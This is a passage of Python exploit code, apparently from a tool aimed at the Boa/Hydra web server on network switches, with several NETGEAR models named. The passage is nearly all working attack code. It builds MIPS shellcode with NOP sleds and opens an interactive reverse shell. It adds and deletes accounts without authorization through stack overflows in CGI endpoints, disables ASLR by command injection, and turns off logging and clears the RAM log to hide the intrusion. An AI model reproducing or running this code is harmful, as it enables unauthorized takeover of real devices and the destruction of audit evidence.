boa/Hydra )\r\n\r\n\t\t#\r\n\t\t# Child\r\n\t\t#\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 60) + struct.pack('>L',CRLF_NOP))\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP))\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP))\r\n\t\t#\r\n\t\t# Shellcode\r\n\t\t#\r\n\t\tquery_args += self.shellcode()\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 17) + struct.pack('>L',CRLF_NOP))\r\n\r\n\t\t#\r\n\t\t# Parent\r\n\t\t#\r\n\t\tquery_args += (struct.pack('>L',NOP) * 59)\r\n\t\t#\r\n\t\t# Restart Boa/Hydra to mitigate DoS\r\n\t\t# (From boa/Hydra binary == binary dependent)\r\n\t\t#\r\n\t\tquery_args += struct.pack('>L',0x8f848018) # opcode [la $a0, 0x430000]\r\n\t\tquery_args += struct.pack('>L',self.target['exploit']['heack_hydra_shell']['system']) # opcode, binary dependent [la $t9, system]\r\n\t\tquery_args += struct.pack('>L',0x0320f809) # opcode [jalr $t9 ; system]\r\n\t\tquery_args += struct.pack('>L',self.target['exploit']['heack_hydra_shell']['handler']) # opcode, binary dependent [addiu $a0, (.ascii \"handler -c boa &\" - 0x430000)]\r\n\t\tquery_args += struct.pack('>L',CRLF_NOP)\r\n\t\t#\r\n\t\t# Parent Boa/Hydra will get SIGSEGV here, but we do not care as its restarted\r\n\t\t#\r\n\r\n\t\tURI = self.target['exploit']['heack_hydra_shell']['uri'] + (struct.pack('>L',NOP) * 247) + struct.pack('>L',JUMP) + struct.pack('>L',NOP)\r\n\r\n\r\n\t\tif self.target.get('hash_uri'): # NETGEAR Inc. 
(GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP)\r\n\t\t\tURI = self.target['exploit']['heack_hydra_shell']['uri']\r\n\t\t\tURI += '&&' # align\r\n\t\t\tURI += self.netgear_hash(URI)\r\n\t\t#\r\n\t\t# Everything here is designed to have opcodes properly aligned in memory\r\n\t\t#\r\n\t\tMESSAGE = 'POST '+ URI + ' HTTP/1.1\\r\\n'\t# Important with 3x 0x20 between POST and URI to align opcodes at heap\r\n\t\tMESSAGE += 'Content-Length: 3133337\\r\\n'\t# Trick Boa/Hydra to think we will send more than 1MiB\r\n\t\tMESSAGE += 'Host:PWN' + '\\r\\n\\r\\n'\t\t\t# 'PWN' = Align opcodes in memory\r\n\t\tDEBUG(\"SEND\",MESSAGE)\r\n\t\tMESSAGE += query_args\r\n\r\n\r\n\t\tlog.success(\"Payload: {} bytes, $v0: {}\".format(len(query_args),hex(len(query_args)) ))\r\n\r\n\t\tself.rport = int(self.rhost.split(\":\")[1])\r\n\t\tself.rhost = self.rhost.split(\":\")[0]\r\n\r\n\t\ttry:\r\n\t\t\tr = remote(self.rhost,self.rport,ssl=False) # HTTP Working, about 0x105c in $v0\r\n\t\t\t#r = remote(self.rhost,self.rport,ssl=True) # HTTPS Not working, need minimium 0x4350 in $v0\r\n\t\texcept Exception as e:\r\n\t\t\t# Dirty but works\r\n\t\t\tself.event.set()\r\n\t\t\tremote(\"127.0.0.1\",self.lport,ssl=False)\r\n\t\t\treturn False\r\n\t\ttry:\r\n\t\t\tr.send(MESSAGE)\r\n\t\t\tr.close()\r\n\t\texcept Exception as e:\r\n\t\t\t# Dirty but works\r\n\t\t\tself.event.set()\r\n\t\t\tremote(\"127.0.0.1\",self.lport,ssl=False)\r\n\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: N/A\r\n\t# Exploitable: N/A\r\n\t#\r\n\t# Start thread for exploting, create a listener on LPORT, wait for connection and stop the exploit thread when remote connected\r\n\t#\r\n\tdef heack_shell(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tif not self.target['exploit']['heack_cgi_shell']['vulnerable']:\r\n\t\t\tlog.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tthread.start_new_thread(self.heack_exploit,(\"heack_exploit\",self.target))\r\n\r\n\t\tl = listen(port=lport)\r\n\t\tc = 
l.wait_for_connection()\r\n\t\tif not self.event.is_set():\r\n\t\t\tself.event.set() # Success, got the connection, stop trying to exploit\r\n\t\t\tc.interactive(prompt = '# ')\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tlog.failure(\"Got internal connection to quit\")\r\n\t\t\tc.close()\r\n\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\t# This will load shellcode on remote, used for both stack and heap.\r\n\t# stack: walk down in stack and hit the NOP sled to execute shellcode\r\n\t# heap: walk up on heap and hit the NOP sled to execute shellcode\r\n\t#\r\n\tdef heack_exploit(self, threadName, target):\r\n\t\tself.threadName = threadName\r\n\t\tself.target = target\r\n\r\n\t\ttime.sleep(2) # So this will be consistent after output from 'reverse_shell'\r\n\t\tshell = log.progress('shellcode')\r\n\r\n\t\tself.Workaround = self.target['exploit']['heack_cgi_shell']['workaround']\r\n\r\n\t\tNOP = 0x2406ffff\t# NOP (li $a2, 0xFFFFFFFF)\r\n\r\n\t\tSTART = self.target['exploit']['heack_cgi_shell']['START']\r\n\r\n\t\tif self.target['exploit']['heack_cgi_shell']['stack']:\r\n\t\t\tEXPR = (START > self.target['exploit']['heack_cgi_shell']['STOP']) # down on stack\r\n\t\telse:\r\n\t\t\tEXPR = (START < self.target['exploit']['heack_cgi_shell']['STOP']) # up on heap\r\n\r\n\t\twhile EXPR:\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\r\n\t\t\tshell.status(\"{} searching\".format(hex(START)))\r\n\t\t\t#\r\n\t\t\t#\r\n\t\t\tquery_args = self.target['exploit']['heack_cgi_shell']['query']\r\n\t\t\tquery_args = query_args.replace(\"_ALIGN\",self.random_string(self.target['exploit']['heack_cgi_shell']['align']))\r\n\t\t\tquery_args = query_args.replace(\"_USRNOP\",struct.pack('>L',NOP) * self.target['exploit']['heack_cgi_shell']['usr_nop'])\r\n\t\t\tquery_args = query_args.replace(\"_SHELLCODE\",self.shellcode())\r\n\t\t\tquery_args = query_args.replace(\"_PWDNOP\",struct.pack('>L',NOP) * 
self.target['exploit']['heack_cgi_shell']['pwd_nop']) # Filler only\r\n\r\n\t\t\tif self.target['login']['encryption'] == 'caesar':\r\n\t\t\t\tquery_args = query_args.replace(\"_RA_START\",struct.pack('>L',START + 0xc1c1c1c1)) # caesar bug? =]\r\n\t\t\telse:\r\n\t\t\t\tquery_args = query_args.replace(\"_RA_START\",struct.pack('>L',START))\r\n\r\n\t\t\ttry:\r\n\t\t\t\tURI = self.target['exploit']['heack_cgi_shell']['login_uri']\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\r\n\t\t\t\t#DEBUG(\"RECV\",response.read())\r\n\t\t\t\t#self.event.set()\r\n\t\t\t\t#r = remote(\"127.0.0.1\",self.lport,ssl=False)\r\n\t\t\t\t#r.close()\r\n\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tif e.code == 502:\r\n\t\t\t\t\tpass\r\n\t\t\t\telse:\r\n\t\t\t\t\tshell.failure(str(e))\r\n\t\t\t\t\tself.event.set()\r\n\t\t\t\t\tr = remote(\"127.0.0.1\",self.lport,ssl=False)\r\n\t\t\t\t\tr.close()\r\n\t\t\t\t\treturn False\r\n\r\n\t\t\tif self.event.is_set():\r\n\t\t\t\tshell.success(\"{} <= found\".format(hex(START))) # Its lovely when [stack] are rwxp :>\r\n\t\t\t\treturn True\r\n\r\n\t\t\tif self.target['exploit']['heack_cgi_shell']['stack']:\r\n\t\t\t\tSTART = START - 0x30 # Walk down from top of stack\r\n\t\t\telse:\r\n\t\t\t\tSTART = START + 0xC00 # Walk up on heap (and bigger jumps)\r\n\r\n\t\tshell.failure(\"Not found, play with start/stop addresses?\")\r\n\t\t# Little dirty but works\r\n\t\tself.event.set()\r\n\t\tr = remote(\"127.0.0.1\",self.lport,ssl=False)\r\n\t\tr.close()\r\n\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef stack_add_account(self, target):\r\n\t\tself.target = target\r\n\r\n\t\taccount = log.progress(\"Stack ADD Account\")\r\n\r\n\t\tif not self.target['exploit']['stack_cgi_add_account']['vulnerable']:\r\n\t\t\taccount.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tURI = 
self.target['exploit']['stack_cgi_add_account']['uri']\r\n\r\n\t\tlog.info(\"Credentials: {}/{}\".format(str(self.credentials.split(':')[0]),str(self.credentials.split(':')[1])))\r\n\r\n\t\tself.Workaround = self.target['exploit']['stack_cgi_add_account']['workaround']\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_add_account']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_add_account']['address'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_add_account']['account'])\r\n\t\t\tquery_args = query_args.replace(\"USERNAME\",str(self.credentials.split(':')[0]))\r\n\t\t\tquery_args = query_args.replace(\"PASSWORD\",str(self.credentials.split(':')[1]))\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\t\t\taccount.failure(response.code)\r\n\t\t\treturn False\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\taccount.success(\"success\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\taccount.failure(str(e))\r\n\t\t\t\treturn False\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef stack_del_account(self, target):\r\n\t\tself.target = target\r\n\r\n\t\taccount = log.progress(\"Stack DEL Account\")\r\n\r\n\t\tif not self.target['exploit']['stack_cgi_del_account']['vulnerable']:\r\n\t\t\taccount.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tURI = self.target['exploit']['stack_cgi_del_account']['uri']\r\n\r\n\t\tself.Workaround = 
self.target['exploit']['stack_cgi_del_account']['workaround']\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_del_account']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_del_account']['address'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_del_account']['account'])\r\n\t\t\tquery_args = query_args.replace(\"USERNAME\",self.credentials.split(':')[0])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\t\t\taccount.failure(response.code)\r\n\t\t\treturn False\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\taccount.success(\"success\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\taccount.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef stack_cgi_diag(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tping = log.progress(\"Stack DIAG\")\r\n\r\n\t\tif not self.target['exploit']['heack_cgi_shell']['stack']:\r\n\t\t\tping.success(\"heap selected (ASLR == False)\")\r\n\t\t\treturn True\r\n\r\n\t\tif not self.target['exploit']['stack_cgi_diag']['vulnerable']:\r\n\t\t\tping.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tASLR_ENABLED = True # Always assume that ASLR is enabled, until verified\r\n\r\n\t\tURI = self.target['exploit']['stack_cgi_diag']['uri']\r\n\r\n\t\tself.Workaround = self.target['exploit']['stack_cgi_diag']['workaround']\r\n\t\tif 
self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\t# Inject (disable ASLR)\r\n\t\t\tping.status(\"Injecting to disable\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_diag']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_diag']['web_sys_ping_post'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_diag']['sys_ping_post_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_diag']['sys_ping_post_SIGSEGV']:\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tping.failure(\"Disable Injection: Failed!\")\r\n\t\t\t\treturn False\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tping.status(\"Done\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tping.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\tif self.target['exploit']['stack_cgi_diag']['sys_ping_post_check']:\r\n\t\t\ttry:\r\n\t\t\t\ttime.sleep(1)\r\n\t\t\t\t# Inject (check ASLR)\r\n\t\t\t\tping.status(\"Injecting to verify\")\r\n\t\t\t\tquery_args = self.target['exploit']['stack_cgi_diag']['content']\r\n\t\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_diag']['web_sys_ping_post'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_diag']['sys_ping_post_check'])\r\n\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\tresponse = 
HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tping.failure(\"Verify Injection: Failed!\")\r\n\r\n\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\t\tif e.code == 502:\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\t\tping.status(\"Verifying ASLR\")\r\n\t\t\t\t\tif self.Workaround:\r\n\t\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\telse:\r\n\t\t\t\t\tping.failure(str(e))\r\n\t\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\tURI = self.target['exploit']['stack_cgi_diag']['verify_uri']\r\n\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\tresponse = response.read().split()\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tif response[0] == '0':\r\n\t\t\t\tping.success(\"ASLR disabled\")\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tping.failure(\"ASLR still enabled\")\r\n\t\t\t\treturn False\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif force:\r\n\t\t\t\tping.success(\"Forcing... 
ASLR might been disabled\")\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tping.failure(str(e))\r\n\t\t\t\tlog.failure(\"You can try with --force, some FW do not process correctly after ASLR been disabled\")\r\n\t\t\t\tlog.failure(\"or you can give --auth_shell a try instead\")\r\n\t\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef stack_cgi_sntp(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tSNTP = log.progress(\"Stack SNTP\")\r\n\r\n\t\tif not self.target['exploit']['heack_cgi_shell']['stack']:\r\n\t\t\tSNTP.success(\"heap selected (ASLR == False)\")\r\n\t\t\treturn True\r\n\r\n\t\tif not self.target['exploit']['stack_cgi_sntp']['vulnerable']:\r\n\t\t\tSNTP.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tASLR_ENABLED = True\r\n\t\tURI = self.target['exploit']['stack_cgi_sntp']['uri']\r\n\r\n\t\tself.Workaround = self.target['exploit']['stack_cgi_sntp']['workaround']\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\t# Enable SNTP\r\n\t\t\tSNTP.status(\"Enable SNTP\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_sntp']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_cmd_enable'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_SIGSEGV']:\r\n\t\t\t\tSNTP.failure(\"Enable SNTP: Failed!\")\r\n\t\t\t\treturn False\r\n\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\r\n\t\texcept Exception as 
e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tSNTP.status(\"SNTP Enabled\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\t# Inject SNTP (disable ASLR)\r\n\t\t\tSNTP.status(\"Injecting to disable\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_sntp']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\t\tSNTP.failure(\"Disable Injection: Failed!\")\r\n\t\t\treturn False\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tSNTP.status(\"Done\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\tif self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set_check']:\r\n\t\t\ttry:\r\n\t\t\t\ttime.sleep(1)\r\n\t\t\t\t# Inject SNTP (check ASLR)\r\n\t\t\t\tSNTP.status(\"Injecting to verify\")\r\n\t\t\t\tquery_args = self.target['exploit']['stack_cgi_sntp']['content']\r\n\t\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\t\tquery_args = 
query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set_check'])\r\n\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tSNTP.failure(\"Verify Injection: Failed!\")\r\n\t\t\t\treturn False\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\t\tif e.code == 502:\r\n\t\t\t\t\tpass\r\n\t\t\t\telse:\r\n\t\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\t\treturn False\r\n\r\n\r\n\t\tSNTP.status(\"Verifying ASLR\")\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\tURI = self.target['exploit']['stack_cgi_sntp']['verify_uri']\r\n\t\t\tDEBUG(\"SEND\",URI)\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\tresponse = response.read().split()\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tif response[0] == '0':\r\n\t\t\t\tSNTP.success(\"ASLR disabled\")\r\n\t\t\t\tASLR_ENABLED = False\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(\"ASLR Enabled\")\r\n\t\t\t\treturn False\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif force:\r\n\t\t\t\tSNTP.success(\"Forcing... 
ASLR might been disabled\")\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\t# Delete SNTP injection\r\n\t\t\tURI = self.target['exploit']['stack_cgi_sntp']['uri']\r\n\t\t\tSNTP.status(\"Removing injection\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_sntp']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSntpDel_set'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_sntp']['sys_timeSntpDel_set_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tSNTP.failure(\"Removing injection: Failed!\")\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\t\treturn False\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tSNTP.status(\"Done\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\t# Disable SNTP\r\n\t\t\tSNTP.status(\"Disable SNTP\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_sntp']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_cmd_disable'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not 
encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_SIGSEGV']:\r\n\t\t\t\tSNTP.failure(\"Disable SNTP: Failed!\")\r\n\t\t\t\treturn False\r\n\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tSNTP.status(\"SNTP Disabled\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\r\n\t\tif not ASLR_ENABLED:\r\n\t\t\tSNTP.success(\"Success\")\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tSNTP.failure(\"ASLR Enabled: Failure\")\r\n\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef stack_cgi_log(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tself.Workaround = self.target['exploit']['stack_cgi_log']['workaround']\r\n\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\tURI = self.target['exploit']['stack_cgi_log']['uri']\r\n\r\n\t\tlogging = log.progress(\"Stack LOG disable & clean\")\r\n\t\tif not self.target['exploit']['stack_cgi_log']['vulnerable']:\r\n\t\t\tlogging.failure(\"No logging on this switch (?)\")\r\n\t\t\treturn True\r\n\t\ttry:\r\n\t\t\t# Disable logging\r\n\t\t\ttime.sleep(1)\r\n\t\t\tlogging.status(\"Trying to disable\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_log']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", struct.pack('>L',self.target['exploit']['stack_cgi_log']['log_settings_set'] + 0x58000000) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_log']['log_settings_set_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif 
self.target['exploit']['stack_cgi_log']['log_settings_set_SIGSEGV']:\r\n\t\t\t\tlogging.failure(\"Disable: Failed!\")\r\n\t\t\t\treturn False\r\n\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tlogging.status(\"Disabled\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tlogging.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\t# clean ram log\r\n\t\t\ttime.sleep(1)\r\n\t\t\tlogging.status(\"Trying to clean ramlog\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_log']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", struct.pack('>L',self.target['exploit']['stack_cgi_log']['log_ramClear'] + 0x58000000) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_log']['log_ramClear_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_log']['log_ramClear_SIGSEGV']:\r\n\t\t\t\tlogging.failure(\"Clean RAM: Failed!\")\r\n\t\t\t\treturn False\r\n\t\t\tif 